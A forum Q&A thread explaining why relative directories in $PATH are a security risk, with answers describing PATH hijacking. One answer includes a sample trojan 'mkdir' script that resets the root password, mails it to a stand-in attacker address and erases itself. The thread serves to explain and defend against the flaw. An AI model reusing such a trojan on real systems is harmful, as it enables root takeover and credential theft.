# Security implications of using relative paths in the PATH enivronmental variable?

Tags: linux, security, environment-variables

We had an audit just flag us for having relative paths inside out `$PATH` env variable. I am uncertain if this is truly a security concern and would like to reach out to everyone to see if this is really a security concern or whether its just a *best practices* thing as I would assume. Can someone provide information on any security concerns of using `$PATH` with relatives? Thanks

Comment: Can you give an example relative path I can use to work with?

Comment: @MatthewIfe `root@host[/home/jd_daniel]> echo $PATH
:/usr/local/php/bin:apps/java/bin:/sbin:/bin:/usr/sbin`

Answer (score 4, accepted):

The problem with having a relative path in $PATH is that if an attacker can create a file with a given name in your filesystem, you risk executing that file.

Example: `df` or monitoring says /var is full, `du` says it's `/var/spool/ftp/uploads`, what do you do?

```
cd /var/spool/ftp/uploads
ls -ltr
```

and you are owned. You don't even see `ls` in the output, so you'll never know.

Replace ftp uploads with some data directory of some client website, or the /tmp directory of a shared machine, or a lot of other things.

Admittedly it won't happen often, but the risk exists, and writing `./script` instead of `script` is easy.

Comment: @MatthewIfe's answer is good too (but mine was first :) ). He notes that since your `.` is first in $PATH the problem is worse, the attacker's files will have precedence over yours. If your `.` was last in the $PATH, the attacker's files would only be able to catch typos, which is better, but still not good.

Comment: changed accepted and plus one to your comment, plz return the favor

Comment: @MatthewIfe doesn't need the rep and I think my example is easier to understand, but I'm sure both of us would like to know why you changed your mind :)

Answer (score 9):

There are two problems with the path you are using.

1. The path is relative.
2. The relative path comes *before* the main paths.

Lets presume you have the following shell script you use as root to update some web application and you have set the `$PATH` being used in `/etc/profile`

```
#!/bin/bash
pushd /dev/shm
git clone http://some/git/path/web_app
cp -a web_app /var/www/html
rm -fr web_app
popd
```

To a attacker you are providing a means to execute something in the shell which is controlled by the said attacker. A form of attack would look like this - where I am attempting to subvert control of the `mkdir` call in the vulnerable script.

```
attacker$ cd /dev/shm
attacker$ mkdir -p apps/java/bin
attacker$ vi apps/java/bin/mkdir
#!/bin/bash
echo "some_random_password" | passwd --stdin root
echo "We owned that guy with some_random_password" | mail -s "Pwned" attacker@somewherebad.com
/bin/mkdir $@
rm -fr /dev/shm/apps
attacker$ chmod +x apps/java/bin/mkdir
```

Then I wait for you to update your webapp.

Now what happens, is that the vulnerable script switches to `/dev/shm`. When it does this and runs `mkdir` it finds the `apps/java/bin/mkdir` program first, which in this case resets the root password, emails the attacker of the new root password, actually calls the real `mkdir` (to hide the fact anything has actually happened) and removes itself from the attack path.

As root, you've got **no** idea what happened and the evidence is erased once the payload was delivered.